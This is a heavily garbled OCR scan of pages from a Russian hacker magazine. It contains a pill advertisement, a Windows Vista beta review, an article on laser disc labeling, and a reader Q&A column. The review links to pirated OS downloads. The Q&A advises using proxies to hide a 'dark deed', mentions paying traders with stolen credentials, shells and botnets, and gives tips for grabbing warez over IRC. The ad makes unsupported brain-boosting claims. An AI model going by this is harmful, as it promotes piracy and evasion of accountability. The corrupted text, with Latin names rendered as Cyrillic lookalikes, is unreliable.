этому самое время перейти в раздел «Параме- 
тры синхронизации» и указать удобное для те- 
бя расписание © 





Смазка для 
шариков 
и роликов. 

В твоем мозгу. 



В еличайшее изобретение 

человека - компьютер - устроен просто. 
Если, к примеру, в нем «летит» винчестер, 
начиная множить бед блоки, то тогда 
старый винт отправляется в металлолом, 
а на новый загружается последний бекап, 
и дело с концом. А как быть, 
если подводит собственный мозг? 

V __ Г 






1 Ощущение вселенской 
усталости знакомо каждому, а 
вот астения удел заучившихся 

студиозов и заработавшихся 

программеров. Астения - это такая усталость, 
которая не собирается исчезать даже после 
отдыха. 

Пятый экзамен за неделю, создание диплома 
за ночь или создание нормальной сетки для 
огромного офиса за пару дней - задачи, 
вполне способные познакомить вас с астенией. 
Или напомнить традиционную страшилку, 
какая есть в любом вузе страны, про некого 
Ваню-ботана, который учился-учился, да и 
закукарекал... Оттого, что от недосыпа и 
умственной натуги у него в голове что-то с 
рельсов съехало... 

Вот для таких любителей напрячь и перена- 
прячь собственное серое вещество ученые 
придумали замечательное средство - 
активатор мозга. Специальная «умная таблетка» 
способна за короткое время привести самый 
уставший мозг в полную боевую готовность - 
мобилизовать память, сконцентрировать 
внимание, улучшить восприятие информации 
и ускорить ментальные процессы вообще. 

На сайте ѵѵѵѵѵѵ.рЬепотепіаІ.ги можно найти 
мегабайты полезной информации об активато- 
рах мозга и способах проапгрейдить содержи- 
мое твоей черепной коробки. 







ЮНИТЫ КРЕАТИФФ КОДИНГ ІІМХОЮ СЦЕНА ВЗЛОМ ИМПЛАНТ РС_20МЕ РЕПРШМ НЬЮСЫ 





042 

«Перспектива» 

мелкомягких 

ЗДРАВСТВУЙ, ДОРОГОЙ ЧИТАТЕЛЬ. НАКОНЕЦ, 
МНЕ В РУКИ ПОПАЛСЯ ДОЛГОЖДАННЫЙ БИЛД 
ѴѴІЫООѴѴЗ ѴІЗТА. КОНЕЧНО, УЖЕ МНОГИЕ СЛЫ- 
ШАЛИ О НЕЙ, А НАИБОЛЕЕ ПРОДВИНУТЫЕ УЖЕ 
И ПОПРОБОВАЛИ В ДЕЛЕ НОВЫЕ ФОРТОЧКИ. 
НАШ КРАТКИЙ ОБЗОР ПРЕДНАЗНАЧЕН ДЛЯ 
ТЕХ, У КОГО ПОКА НЕТ ВОЗМОЖНОСТИ ОЗНА- 
КОМИТЬСЯ ЛИЧНО С НОВОЙ ВЕРСИЕЙ ВСЕМИ 
НАМИ ГОРЯЧО ЛЮБИМОГО ПРОДУКТА ОТ НЕ 
МЕНЕЕ ГОРЯЧО ЛЮБИМОЙ КОМПАНИИ 

МЮРЮЗОРТ I Курил ьченко Максим ака ЕхІгаСОМ, 

Елизаров Сергей ака аВАОоппа 




Обзор 

ѴѴіпсІоѵѵз Ѵізіа ЬиіІсІ 5112 

[где взять?] Для особо желающих самим попробовать новую операци- 
онку сообщим источники, где ее еще можно бесплатно скачать и где 
можно платно заказать диск. 

Образ 130 можно найти по следующим адресам: ЫІр-УЛиНоІѵѵагег.Ыг/ 
роз!.р^ір?149, ѵѵѵѵѵѵ.пМ-Іеат.огд/соттепІз.рІір?ісІп=623. Для тех, у кого 
туго с английским, и для прочих патриотов — русификатор: 
ЫІр://{иІІоішге2.Ыг/розі.рІір?201 . Заказать диск с новой операционной сис- 
темой можно тут: \л/ш\л/.ІюІссІ.ги/сді-Ып/іпсІех.рІ?5==13685==0==І2Опе 

(в большинстве московских локал давно все это лежит :) - прим. Лозовского). 
Итак, приступим. Начать, пожалуй, стоит с рекомендованных фирмой- 
разработчиком аппаратных требований. Это СРІІ 1.5 ОН2/512 МЬ 
ПАМ/НЮЭ 6 ОЬ. 

Сразу можно прикинуть, что размер партиции для форточек составить дол- 
жен никак не менее десяти гигов. Насчет остальных требований: на мой 
взгляд, они более чем скромные. Я ожидал более серьезных требований. 
Инсталляция производилась на компьютере следующей конфигурации: 
СРІІ 3.0 ОН2/768 МЬ ВАМ/НО О 80 ОЬ. 

[процесс установки] Попытка установить ОС из распакованного об- 
раза 130 вызвала ошибку. Сама МісгозоК рекомендует устанавливать ОС 
либо с ЭѴЭ диска, либо из смонтированного образа — так я и поступил. 
Также на выбор предлагается либо новая установка, либо установка с 
обновлением, которая оказалась недоступной, так как обновляется она 
только с версии ЬопдЬогп ЬиіІсІ 5099. То есть под чем бы ты ни сидел, 
ставить придется заново. Ну да, не беда. 

Далее для установки нам предъявляются имеющиеся разделы дисков. 
После нужного выбора следует создание загрузочного сектора и опреде- 
ление минимально необходимых ресурсов компьютера для установки. 
Это составляет 10 — 15 минут (на описанной выше конфигурации). Отсю- 
да и далее я буду указывать время процессов. Первая оплошность раз- 
работчиков — не дать возможность пользователям отслеживать время 
установки. Ну сколько можно уже? Неужели нельзя было поставить тай- 
мер? Эх, Майкрософт... 

После первой перезагрузки (забегая вперед, скажем, что всего их пос- 
ледует три) идет распаковка файлов. В ѴѴіпсІоѵѵз Ѵізіа все они (файлы) 
спрятаны в единый файл іпзіаіі.ѵѵіт, занимающий 900 Мб. Ожидание 
длилось 15 — 20 мин. 

[вторая перезагрузка] Далее мы наблюдаем (вернее, представляем 
в нашем широком воображении) за определением аппаратных уст- 
ройств и копированием файлов, в процессе которого программа инстал- 
ляции убедительно просит не перезагружать компьютер. 

Смело можешь идти заниматься своими делами, так как копировалось 
и настраивалось все это счастье ни много ни мало — 45 мин. 

Что стоит отметить? Установка не сопровождена никакими поясняющи- 
ми сведениями, что, я думаю, осложнит восприятие у неопытных и начи- 
нающих пользователей (хотя это, вероятно, будет реализовано в после- 
дующих версиях). Я так надеялся, что мне опять скажут: «Откиньтесь на 
спинку кресла...» (ну ты помнишь, о чем я), и я с наслаждением прочту 
хвалебные оды разработчиков своему новому детищу. Но этого не про- 
изошло, и весь процесс инсталляции пришлось скучать. 

После того как ОС успешно установилась, и компьютер перезагрузился 
в последний раз, моему взору предстал «Рабочий стол». Я так долго 
ждал этого момента в ожидании сногсшибательной графики, но, увы, 
наш новый десктоп незначительно (опять же, по моему скромному мне- 
нию) отличается от своего младшего брата — десктопа ѴѴіпсІоѵѵз ХР. 
Главной отличительной чертой стала прозрачная иконка «Корзины», но- 
вые обои (а обои, стоит заметить, нисколько не дефицитный товар), 
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а также черная строка запуска. Обидно, друзья. Я мечтал о ЗЭ-наворо- 
тах, неимоверной крутизне и новом концепте... Ан-нет. 

Но не все так запущено. При дальнейшей работе я стал отмечать все 
больше и больше новомодных изменений в 0111. Ура? Вообще, графи- 
ческий интерфейс действительно значительно изменился. Появился 
объем у свернутых программ в строке запуска. Модно стали подсвечи- 
ваться кнопки сворачивания, разворачивания и закрытия окна. При ко- 
пировании прогресс бар стал также объемным. 

Но все это можно было встретить и у сторонних разработчиков графи- 
ческих интерфейсов для ѴѴіпбоѵѵз ХР. Многие из нас качали эти пресло- 
вутые псевдолонгхорновские 0111. Так что особой радости я не испытал. 
Ну, красивенько. Не более того — привык за 10 минут. 

Отвлекшись от графических прибамбасов, я отметил, что при загрузке 
ни прозвучало не единого звука, и решил посмотреть на панель уст- 
ройств компьютера, чтобы убедиться, что все устройства встали нор- 
мально. И каково же было мое разочарование, когда я увидел нераспоз- 
нанный аудиоадаптер. 

Вообще, сразу после загрузки ОС выводится окошко с предложением 
запустить некий ІпзІаІІ Зирріетепіаі Огіѵегз, который, по заверениям 
разработчиков, должен был обеспечить пользователей драйверами 
ГРАФИЧЕСКИХ И СЕТЕВЫХ устройств, не присутствовавших в станда- 
ртном комплекте установки. И я до сих пор не могу понять, почему туда 
же нельзя было включить драйвера для звука? Наверное, этот недоста- 
ток тоже выправят в финальной версии системы. А то что же это полу- 
чается: налицо дискриминация устройств. Кто-то ставится в процессе 
установки, кто-то — после... А кто-то вообще не ставится? Ну, стандарт- 
ные звуковые драйвера, мне кажется, уж можно было добавить к тем 
900 мегабайтам хлама, что напихали в инстальник. 

Запуск родной инсталляции АисІіоМАХ для интегрированного чипсета 
АС'97, предназначенную для ѴѴіпХР привел к критической ошибке, выз- 
ванной несовместимостью версий. Ай-ай-ай, как неудобно... Но проблему 
со звуком я решил элементарно — указал расположение файлов непос- 
редственно в обновлении драйверов. То есть ткнул пальцем, мол, тут они. 
Далее я запустил ОхОіад, чтобы убедиться в том, что теперь уже мне 
ничто не помешает наслаждаться системой ОігесІХ, но не тут-то было. 
Ознакомившись с отчетом о тестировании системы, я обнаружил, что 
попросту не хватает некоторых файлов, необходимых для полноценной 
работы той или иной мультимедиа-системы, а в реестре отсутствовали 
многие ключи. Из чего был сделан вывод, что некоторые файлы библи- 
отек и драйверов не имеют цифровой подписи, что ведет к нестыковке 
с ОігесІХ-системой. Кому вообще нужна эта цифровая подпись? 




А сейчас внимание — сюрприз! Заходим в стб, командуем там 
Зузіетіпіо. И что мы видим в строке названия продукта? Ура! МісгозоШ 
ѴѴіпбоѵѵз® 2000 РгоІеззіопаІ! Молодцы, разработчики! 

Захотелось узнать, что же нам пишет раздел реестра НКІ_М -> ЗоКѵѵаге 
-> МісгозоК -> ѴѴіпбоѵѵзЫТ -> СигепІѴегзоп. И каково же было мое удив- 
ление, когда в строковом параметре РгобисІЫате я увидел: ѴѴіпбоѵѵз 
(ТМ) Собе ІМате «І_опдІіогп» РгоІеззіопаІ. Просто великолепно. Я дово- 
лен! МісгозоК как всегда держит марку. 

Перейдем к рассмотрению, на мой взгляд, самого важного элемента лю- 
бой ОС семейства ѴѴіпбоѵѵз — Проводнику. Этот, не побоюсь такого сло- 
ва, «столп» операционной системы действительно пережил основатель- 
ную переработку, хотя принципы навигации остаются неизменными. С 
привычным представлением адресной строки пользователям придется 
попрощаться, что станет маленьким неудобством. Для меня, например, 
точно станет, хотя файловые менеджеры никто еще не отменял, но все-та- 
ки, кому она мешала-то, адресная наша строка? Есть и большой плюс: те- 
перь каждый из подчиненных элементов оной стал раскрывающимся, и 
отображает список каталогов в нем. Действительно, не плоха идея вирту- 
альных папок, хотя особой функциональности в ней я так и не заметил. 
Также произвела впечатление возможность изменять представление па- 
пок и файлов. Неплохо реализована строка статуса, в которой показыва- 
ется не только стандартный параметр — размер и дата изменения файла, 
но и присутствует возможность присвоить файлу рейтинг от одного до пя- 
ти, хотя не понятно, почему к каталогам это отношения не имеет? Поиск 
документов — это вообще загадочная штука. При попытке найти файл 
тзбоз.зуз, а он у меня точно присутствует в корневом каталоге диска С:\, 
поисковик мне выдал, что такого файла (вернее, документа, содержащего 
тзбоз.зуз) не найдено в пользовательской папке, а изменить место поис- 
ка оказалось невозможно. Поэтому найти какой-либо документ будет 
очень сложно. Особенно, если у тебя неразбериха в структуре директорий. 
А ведь при загрузке ОС сразу же стартует такая служба ѴѴіпбоѵѵз ЗеагсІі 
Епдіпе, что заметно тормозит запуск операционки, и должно служить ус- 
корением до молниеносной скорости процесса поиска файлов. Опять- 
таки, стоит уповать на то, что версия эта у нас вовсе не финальная, и в 
финальном релизе уж точно все будет работать как надо. 

При копировании информации в проводнике в окне копирования выво- 
дится подробная информация о происходящем, включая скорость копи- 
рования в Мб/сек, что является приятным дополнением. Также, к вели- 
кой радости владельцев мобильных устройств, появилась возможность 
отправки файлов сразу на порт ВІиеТооІИ, если такой присутствует. 

В настройках папки «Мои документы» появилась возможность синхро- 
низации с другими компьютерами, но отмечу один малоприятный баг: я, 
как ни хотел, не смог отобразить ссылку «Мои документы» на рабочем 
столе без того, чтобы не создавать новый ярлык. 

Хочу отметить, что для запуска программ, находящихся в «Русских» каталогах, 
необходимо поменять национальные установки и добавить русский язык. Но я 
уверен, что это будет исправлено потом в русской локализации ѴѴіпбоѵѵз Ѵізіа. 
Говоря об ІЕ, можно отметить его великолепную реализацию. Наконец-то 
разработчики сделали многооконность, которую, наверное, подхватили у 
других навигаторов. Также поражает скорость загрузки страничек, на по- 
рядок превосходящая загрузку идентичных в ѴѴіпХР при скорости соеди- 
нения по модему 33,6 Кб. Осталось дождаться только информации о най- 
денных в нем уязвимостях, поставить заплатки и жить счастливо. Ну не 
верю я, что всеми обруганный ослик ІЕ станет толковым браузером. 
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[панель управления] В ней появились ссылки на такие новые прог- 
раммы, как Іпсіехіпд апсі ЗеагсІі Орііоп, управляющий службой ѴѴ5Е 
(ѴѴіпсІоѵѵз ЗеагсІі Епдіпе), Аихіііагу Эізріау, назначение которой для меня 
остается загадкой, іЗСЗІ, РогІаЫе Эеѵісе и РогІаЫе Месііа Оеѵісе, 
Ргодгат, Зоіиііопз Іо РгоЫет, Зупс Мападег. Отдельно можно отметить 
службу ѴѴіпсІоѵѵз Рагепіаі Сопігоі, которая служит для ограничения игр с 
«неподобающими» жанрами и смыслом. Думаю, счастливым обладате- 
лям юных чад это нововведение весьма пригодится. 

Теперь о глюках программ из панели управления. Как же без них? 

При попытке создания нового пользователя с ограниченными правами 
мне это не удалось, так как операционная система сообщила, что необ- 
ходимо создать хотя бы одного пользователя с правами администрато- 
ра. Как будто учетная запись, созданная по умолчанию при установке 
Ѵізіа, данными полномочиями не располагала. 

Также пропала возможность добавлять или удалять программы, постав- 
ляемые вместе с операционной системой (компоненты ѴѴіпсІоѵѵз). Но ду- 
маю, эту проблему в скором времени расковыряют, и найдут способ это 
сделать. Реестр нам поможет! 

Еще откровенно раздражает то, что даже после отключения автомати- 
ческого обновления, центр безопасности все равно назойливо продол- 
жает напоминать, что, мол, автоматическое обновление выключено, 
и это опасно. Очень опасно! Коленки трясутся просто! 

В нововведениях, я думаю, также стоит отметить добавление к языковым 
настройкам — «разговорные одобрения», видимо, для системы распозна- 
вания речи, которую мне, к сожалению, испытать не пришлось за неиме- 
нием микрофона. Хотя, думаю, она кривая и работает не так, как нужно. 
Еще одной неприятностью стало то, что в некоторых русифицированных 
программах неправильно отображаются шрифты (АЗЭЗее ѵ.6.0), что бу- 
дет исправлено в русскоязычной версии ОС. 

Также можно сказать несколько слов о пункте «Администрирование», 
из которого исчезла привычная ссылка «Службы». Для тех, кто не зна- 
ет: она есть в «Управлении Компьютером» :). Стоит отметить просмотр- 
щик событий, который теперь стал гораздо удобнее. Так что будем 
иметь полноценно оформленные старые логи. 

Реестр Ѵізіа стал гораздо больше, хотя из программ, установленных в 
операционной системе, был только Офис (да и то не полный), ѴѴіпАтр 
и АЗОЗее. Ушло в прошлое привычное представление папки Ооситепіз 
апсі Зеиіпдз, теперь профили пользователей хранятся в каталоге ІІзегз. 
В заключение хочется продекламировать наблюдения сторонних наб- 
людателей. Как утверждает портал 20ІМЕТ.ВІІ, уже установлена офици- 
альная дата выпуска ѴѴіпсІоѵѵз Ѵізіа, и можно рассчитывать на своевре- 
менный выход операционной системы в конце будущего года. Согласно 
статье в ѴѴіпсІоѵѵз ІТ Рго, официальным днем выпуска полной версии Ѵізіа 
станет 7 декабря 2006 года, а вторая бета-версия продукта выйдет в кон- 
це этого года. Со ссылкой на «самые последние внутренние документы 
МісгозоК» в статье утверждается также, что первый выпуск Веіеазе сап- 
бісіаіе операционной системы, ВС0, появится 19 апреля будущего года, а 
второй — 28 июня. После этого, 9 августа, Ѵізіа будет передана в произ- 
водство. Первую бета-версию Ѵізіа тестеры получили в конце июля. 

[конец — делу венец] В заключение хочется сказать, что хакеры доб- 
рались уже и до Ѵізіа. На это у них ушло чуть больше недели (если счи- 
тать со дня выхода Веіа 1), что само по себе демонстрирует особый инте- 
рес, обращенный к следующей версии ѴѴіпсІоѵѵз со стороны кибер-панков. 
По сообщению британского интернет-ресурса РС Рго, на днях в Сети по- 
явились первые экземпляры вредоносных программ, способных с лег- 
костью взломать систему защиты ѴѴіпсІоѵѵз Ѵізіа Веіа 1 . Согласно инфор- 
мации, собранной финской антивирусной компанией Р-Зесиге, австрийс- 



ким хакером (в определенных кругах известным, как Зесопб Рагі Іо НеІІ), 
членом многих хакерских групп, были «выброшены» в глобальную паути- 
ну пять вирусов. Эти программы предназначены для взлома МЗН 
(МісгозоК ЗПеІІ) — интерфейса командной строки новейшей ОС. 

Хотя по заверениям главы антивирусного подразделения Р-Зесиге — 
Микко Хюппонена — данные вирусы не несут особой опасности и вызы- 
вают интерес скорее «исторического» характера, нежели технического, 
так как представляют собой очень примитивные программки. Однако 
очевидно, что на этом хакеры не остановятся, и их следующие творения 
наверняка будут не столь безобидны. 

«Скриптовый язык МЗН — по-настоящему многосторонний, — говорит 
господин Хюппонен. — С его помощью Вы можете управлять любыми 
компонентами... Вы можете отправлять электронные письма прямо из 
командной строки, можете подключаться к ѴѴеЬ-сервисам... Функцио- 
нально МЗН очень схож с ІІпіх». Ну наконец-то!!! 

Тем не менее, судьба самого МЗН пока еще не полностью понятна — сов- 
сем недавно интернет-ресурс ѴѴіпІпзісІег сообщил со ссылкой на офици- 
альных представителей МісгозоТС, что факт его включения в состав фи- 
нальной ѴѴіпсІоѵѵз Ѵізіа еще находится под вопросом. При этом софтвер- 
ный гигант пока отказывается от комментариев относительно причин, зас- 
тавивших его сомневаться по поводу целесообразности поддержки этого 
скриптового языка. Вероятнее всего, еще не все ясно с тем, какие серви- 
сы будут встроены в Ѵізіа. Одни из них потребуют МЗН, другие — нет. 
Многие специалисты сошлись на том, что МЗН — прерогатива «продви- 
нутых» систем, и большинство рядовых пользователей так и не прикос- 
нутся к «великим знаниям» (в которых, как известно, «великая печаль»). 
Господин Хюппонен прокомментировал это так: «Как опытный пользо- 
ватель, я хотел бы иметь на своем компьютере МЗН, но не на компью- 
тере моей мамы!». 

Даже если ѴѴіпсІоѵѵз Ѵізіа все-таки окажется без МЗН, то этот скрипто- 
вый язык наверняка войдет в состав таких серверных продуктов, как 
ЕхсИапде Зегѵег 12. 

Итак, вывод об представленной операционной системе можно сделать 
неоднозначный. С одной стороны, она поражает своим размахом, с дру- 
гой, — удручает недоработками, хотя работает достаточно стабильно 
и быстро. За три дня работы с ней она не слетела ни разу. 

Поставлю ли я ее себе по выходу полноценного релиза? Конечно же, да. 
Хлебнем ли мы лиха с Вистой? Конечно же, да! Будем ли мы ее ненави- 
деть? Конечно же, да! Но ведь это традиция уже, не так ли? © 
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046 

Хай-тек прожиг 

ОДНИ МАРКИРУЮТ СВОИ ДИСКИ СПЕЦИ- 
АЛЬНЫМИ ФЛОМАСТЕРАМИ, ДРУГИЕ ПЕЧА- 
ТАЮТ ЭТИКЕТКИ НА ПРИНТЕРЕ, А ЗАТЕМ 
ПРИКЛЕИВАЮТ ИХ НА ДИСК, ТРЕТЬИ ПЕЧА- 
ТАЮТ ПРЯМО НА САМИХ ДИСКАХ. А ВОТ 
ЧЕТВЕРТЫЕ ИСПОЛЬЗУЮТ ДЛЯ ЭТОГО СА- 
МИ РЕЗАКИ... I МеІ (теІ@а5Іоѵ.пеІ) 



Технологии нанесения 
изображения на диск 

[о чем это я?] В этой статье речь пойдет 
именно о технологиях маркировки дисков при 
помощи лазера. Ведь, согласитесь, что марке- 
ром нельзя нарисовать какой-нибудь красивый 
рисунок, а лазером можно сделать рисунок с 
очень высоким разрешением. Наклейки для 
дисков вообще опасны, ведь если наклеить их 
криво и смято, то диск может разрушиться в са- 
мом приводе из-за неровностей на его поверх- 
ности. А принтеров с поддержкой печати на 
дисках не так уж и много, но имеются в модель- 
ных рядах таких фирм, как Ерзоп и Сапоп. 
Лазерные технологии нанесения изображения 
на диск хороши тем, что не требуют дополни- 
тельных затрат — тебе достаточно иметь при- 
вод с поддержкой данной технологии и не нуж- 
но покупать ни маркеров, ни наклеек, ни карт- 
риджей с краской. 

[сНзкТ@2] Технология ОізкТ@2 существует 
аж с 2002 года. Ее тогда представила компа- 
ния УатаИа, выпустив единственный в мире 
привод с поддержкой этой технологии — 
СВѴѴ-Р1. Татуировка наносилась на рабочую 
поверхность диска. После того как были запи- 
саны данные на диск, он финализировался, и 
на оставшемся месте формировался рисунок 
или текст. Сама татуировка разрабатывалась 






технология от атаНа и ЫЕС: 
І_аЬеІРІазН 



шшш.Іідбізсгібе.сот — 
официальный сайт новой 
технологии. 

біір://б10025. и/и/и/7 .бр. сот 
/еѵѵІгі/т/зоПтгеизІ?бІс=е 
п& іооІ=8оПтгеСаіедогу&Іс 
=еп&ргосІисі=455746&сс=и 
з& оз=228 — Идбізсгібе 
Ргіпі Епдіпе іірбаіе. 
ѵѵѵѵѵѵ.іхЫ.сот/оріісаІ/сбгѵѵ- 
Іезі-ібе/сбгш-іезі-ібе-рі 5- 
уатаба-П .збіті — тест 
привода Уатаба СШ-П 
с технологией 0ізкТ@2. 
иі/\а/ .Іхб1.сот/орііса1/бр640 
.збіті — тест привода НР 
бѵб640і с технологией 
ЫдбіЗсгібе. 



в программе записи дисков Ыего 
Вигпіпд Вот. Выжигаться тэту 
могла только на дисках СО-В с 
темной поверхностью. УатаИа 
объявила официально совмести- 
мыми диски только ѴегЬаІіт се- 
рии ОаІаІЛеРІиз со слоем Зирег 

А20, а также серии МизісЫІеРІиз со слоем Меіаі А20 и диски ТОК 
ВеІІех Шга и ВеІІех Шга МеІаІІіс Оізс. Стоит сказать, что на прожиг 
текста вокруг диска 24 шрифтом тратилось около 10 — 15 минут, что не 
так уж и быстро. Привод был выпущен в нескольких вариантах испол- 
нения: Е-ЮЕ, ЗСЗІ-З, ІІЗВ 2.0 и РігеѴѴіге. Найти на прилавках магази- 
нов у нас в Росии СВѴѴ-Р1 было сложно. Но ваш покорный слуга все- 
таки успел его приобрести, о чем не жалеет до сих пор :). Вскоре ком- 
пания УатаПа объявила, что полностью переключается на технологию 
0\Ю. И о ней не было ничего слышно до второй половины 2005 года. 
Но об этом я упомяну чуть позже. 



[ЫдІіі§сгіЬе] В начале 2005 года в Интернете стали ходить слухи, что 
компания НР хочет представить новую технологию под названием 
ЫдИіЗсгіЬе (полное название ЫдИіЗсгіЬе Оігесі Оізс І_аЬеІіпд), что дослов- 
но можно перевести как «светопись». Суть ее заключается в возмож- 
ности наносить изображение на нерабочую поверхность дисков (СО или 
ОѴО). Для этого на компьютере создаем маркировку и прожигаем — по- 
лучается аккуратно и красиво :). Только после записи данных нужно бу- 
дет перевернуть диск. Стоит заметить, что технология на данный мо- 
мент поддерживает до 256 оттенков серого, и пока речь не идет о соз- 
дании полноцветного изображения. 









диск Сй-Р 

от ѴегЬаІіт с поддерж- 
кой новой технологии 



Для того чтобы воспользоваться новой техно- 
логией, необходимо иметь: 

- ОѴО-привод с технологией ЫдІііЗсгіЬе 

- ЫдИіЗсгіЬе-диск 

- Софт, поддерживающий ЫдПіЗсгіЬе. 

На данный момент выпущено не так много 
ОѴО-резаков с поддержкой новой техноло- 
гии, а те, что выпущены, по скоростям запи- 
си дисков отстают на много от своих соб- 
ратьев без этой технологии. Примером мо- 
жет служить привод НР бѵсІ640і. Среди про- 
изводителей стоит отметить такие фирмы, 

как ВепО, І_аСіе, РИіІірз и, естественно, НР. 

Что касается производителей болванок, то их выбор тоже невелик, так 
как НР требует обязательного тестирования и последующего лицензи- 
рования. Тем самым НР хочет добиться полной совместимости дисков и 
приводов с логотипом ЫдІііЗсгіЬе. Главным производителем дисков на 
данный момент является, конечно же, ѴегЬаІіт. Уже сейчас продаются 
диски СО-Р и ОѴО+Р с поддержкой новой технологии. 

Разработать этикетку можно в очень популярной программе для записи 
дисков ЫЕРО Вигпіпд РОМ, или в специализированной программе, пос- 
тавляемой со многими приводами в геіаіі-версии, ЗигеТНіпд СОЮѴО 
І_аЬеІег. О поддержке новой функции в своих программных продуктах 
заявили также такие компании, как СуЬегІіпк, ІпІегѴісІео и Зопіс. 



[технология изнутри] Если ты уже являешься обладателем 0\Ю- 
рекордера, то стоит сказать, что обновлением прошивки ты не смо- 
жешь добиться поддержки новой технологии. ЫдІііЗспЬе-совместимые 
приводы, имеют немного иное внутреннее строение. В них встроена 

специальная схема, которая име- 
ет датчик для распознавания 
ЫдИіЗсгіЬе-носителя. Еще схема 
отвечает за точную фокусировку 
на нужную дорожку и центровку 
диска. Всего дорожек — 40000, и 
расположены они на расстоянии 
10 микрометров друг от друга. 
Теперь стоит рассказать о време- 
ни, которое занимает прожиг кар- 
тинки. Перед началом прожига 




выбираем качество печати и стартуем 



программа спросит тебя о желаемом качестве изображения, и ты смо- 
жешь выбрать один из режимов: 

- Везі 4 мин. — 36 мин. 

- ІМогтаІ 3 мин. — 28 мин. 

- ЭгаІІ 2 мин. — 20 мин. 

Чем лучше качество ты выберешь, тем контрастнее будет картинка. 

В ближайшее время компания НР планирует наращивать скорость про- 
жига этикеток, так как ждать 40 минут, чтобы получить качественное 
изображение — это очень долго. 

[І-аЬеІНазН] И снова компания ѴатаПа. Теперь уже совместно с Ыес 
они разработали улучшенную версию ОізкТ@2, которая сочетает в себе 
сразу несколько преимуществ: печать как на рабочей поверхности (тех- 
нология ОізкТ@2), так и на внешней стороне (альтернатива ЫдІііЗсгіЬе). 
Но и это еще не все. В противовес ЫдИіЗсгіЬе — новая технология 
І_аЬеІРІазІі позволяет создавать высококачественные рисунки благода- 
ря 256 возможным вариантам оттенков. И скорость создания такой эти- 
кетки — всего 5(!) минут! Это кажется нереальным! Но уже в октябре 
должны появиться в продаже приводы с поддержкой этой технологии. 
Первыми ОѴО-ВѴѴ приводами с поддержкой І_аЬеІРІазІі будут Ыес N0- 
4551 А, N0-3551 А, а также N0-7751 А, предназначенный для установки 
на ноутбуки. Для нанесения изображения на нерабочую поверхность 
диска будет достаточно диска, который имеет поверхность для нанесе- 
ния подписей (ргіпІаЫе-диски). 

Как видно, начало было положено еще в 2002 году, но тогда никто не 
смог составить конкуренцию компании ѴатаІіа. Сейчас же компания 
НР воплотила очень хорошую идею в жизнь. Компания ѴатаНа не ос- 
талась в стороне и предложила продолжение технологии ОізкТ@2. 
Теперь в условиях конкуренции такие технологии, как ЫдІііЗсгіЬе и 
І_аЬеІРІазІі будут стремительно развиваться. 
Вполне возможно, что скоро появятся и по- 
добные технологии от других фирм с какими- 
то своими отличительными чертами. Ну а 
нам, пользователям, остается следить за пос- 
ледними тенденциями в этой области и выби- 
рать себе привод с лучшей технологией. Тем 
более, что приводы с поддержкой новых тех- 
нологий, стоят примерно на 10 — 15% дороже 
своих аналогов без технологии нанесения 
изображения на диск © 







по этим логотипам 
можно узнать о под- 
держке ЫдИіЗсгіЬе 



[ХАКЕР 10 [82] 05 > ИМПЛАНТ 047 ] 










ЮНИТЫ КРЕАТИФФ КОДИНГ ІІІЧІХОЮ СЦЕНА [ВЗЛОМ] ИМПЛАНТ РС_20ЫЕ РЕВВІІМ НЬЮСЫ 



БУДЬ КОНКРЕТНЫМ И ЗАДАВАЙ КОНКРЕТ- 
НЫЕ ВОПРОСЫ! СТАРАЙСЯ ОФОРМИТЬ 
СВОЮ ПРОБЛЕМУ МАКСИМАЛЬНО ДЕТАЛЬ- 
НО ПЕРЕД ПОСЫЛКОЙ В НАСК-РАО. ТОЛЬ- 
КО ТАК Я СМОГУ ДЕЙСТВИТЕЛЬНО ПО- 
МОЧЬ ТЕБЕ С ОТВЕТОМ, УКАЗАТЬ НА ВОЗ- 
МОЖНЫЕ ОШИБКИ. ОСТЕРЕГАЙСЯ ОБЩИХ 
ВОПРОСОВ, ВРОДЕ «КАК ВЗЛОМАТЬ ИН- 
ТЕРНЕТ?», ТЫ ТОЛЬКО ПОТРАТИШЬ ПОЧ- 
ТОВЫЙ ТРАФИК. ТРЯСТИ ИЗ МЕНЯ ФРИШКИ 
(ИНЕТ, ШЕЛЛЫ, КАРТЫ) — НЕ СТОИТ, Я САМ 
ЖИВУ НА ГУМАНИТАРНУЮ ПОМОЩЬ. 





а 



НУ 




О: Хочу быть анонимным в Сети! Как можно обзавестись 
самыми последними и, главное, — рабочими проксами? 

А: Самые последние — значит, самые медленные? Таких не 
держим и речи о них вести не будем! Самые же качественные 
проксы, установленные собственноручно на проверенных сер- 
верах, желательно с поддержкой шифрования. Готовых образ- 
цов софта — море, нужен лишь сервер, который доверит тебе 
установку прокса в свое чрево; сервер, которому ты будешь до- 
верять передачу своих сокровенных данных. Хотя, конечно, по- 
рой прокси-серванты используются как презервативы — один 
раз, когда нужно сделать свое темное дело и скрыться в прос- 
торах Сети. При подобных раскладах можно договориться с 
трейдерами, которые обеспечат тебя всем необходимым в неог- 
раниченном объеме. Небезвозмездно, конечно: трейдеры при- 
выкли получать креды, шеллы, ботнеты и палки за свои услуги. 
Есть же и сердобольные люди, которые выливают в Сеть спис- 
ки для всеобщего доступа. Ресурс, вроде шш.ргохуз4аІІ.сот, 
может стать хорошим примером; про наиболее актуальные хра- 
нилища все знает Гугл. Единственное замечание — не стоит 
строить иллюзии об альтруизме хозяев общедоступных серва- 
ков. Многие из них просто уведут все твои ріаіпіехі-пароли. 



О: Почему у меня никак не получается качать варез на ІРС 
с диалапа? 

А: Основным концептом нашумевшей, но ныне закрытой ми- 
лицией рубрики І_еесІі было как раз скачивание контента на 
ІВС. Сайты, вроде шш.раскеіпеш.сот, предлагают массу 
возможностей добыть самые свежие релизы, причем сделать 
это действительно в реальном времени — скачать все необ- 
ходимое разом, не дожидаясь появления юзера в Сети, как 
получается с р2р. Хотя многие ігс-сервисы недоступны для 
модемщиков. Ряд ботов не дает скачивать варез, если ты не 
можешь тянуть файлы быстрее 5 Кб/сек. Стоит пощелкать 
нужный пак на разных ботах, и один из них обязательно вы- 
даст необходимое без обозначенного ограничения. 

О: Не могу активировать доступ в инет по карте, когда как 
ІР-телефония по ней работает на 5+, баланс там просто без- 
донный! Как меня похакали? 

А: Существуют универсальные карты, по которым можно 
юзать инет и телефонию одновременно. Хотя большая 
часть тех, где необходима регистрация-активация для дос- 
тупа в инет, позволяют выбрать лишь одно: инет, либо звон- 






ки за бугор. Так что можешь быть спокоен, ты не стал жертвой ха- 
ка, просто карта оказалась не универсальной. За примером таких 
карт далеко ходить не надо: у МТУ-Интел (точка. ру), к примеру, 
сделав лишь один ІР-звонок, ты уже не сможешь занести остав- 
шуюся сумму к себе на инет-счет. 

